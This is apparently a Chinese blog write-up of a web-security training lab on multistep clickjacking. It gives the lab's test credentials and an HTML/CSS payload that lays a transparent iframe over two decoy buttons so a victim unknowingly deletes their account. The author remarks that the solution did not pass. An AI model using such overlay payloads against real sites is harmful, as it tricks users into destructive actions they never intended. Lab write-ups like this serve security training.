Lab: Multistep clickjacking:多点击劫持

时间:2021-08-24
本文章向大家介绍Lab: Multistep clickjacking:多点击劫持,主要包括Lab: Multistep clickjacking:多点击劫持使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

靶场内容

这个实验室有一些受CSRF 令牌保护的帐户功能,还有一个确认对话框来防止点击劫持。为了解决这个实验,构建一个攻击,通过点击“首先点击我”和“点击我”诱饵动作来欺骗用户点击删除帐户按钮和确认对话框。您将需要在本实验中使用两个元素。

您可以使用以下凭据自行登录帐户: wiener:peter

漏洞解析

  • 这就需要两个点击劫持来完成:一个用于点击,一个用于确认
    源代码如下:
<style>
   iframe {
       position:relative;
       width:500;
       height: 700;
       opacity: 0.0001;
       z-index: 2;
   }
   .firstClick, .secondClick {
       position:absolute;
       top:530;
       left:50;
       z-index: 1;
   }
   .secondClick {
       top:295;
       left:210;
   }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac3d1f971eae2e4a800301af00fb00e0.web-security-academy.net/my-account"></iframe>

就不知道为啥不给我过

本文来自博客园,作者:{Zeker62},转载请注明原文链接:https://www.cnblogs.com/Zeker62/p/15179120.html

原文地址:https://www.cnblogs.com/Zeker62/p/15179120.html

随机文章
本站知识点必读
最近更新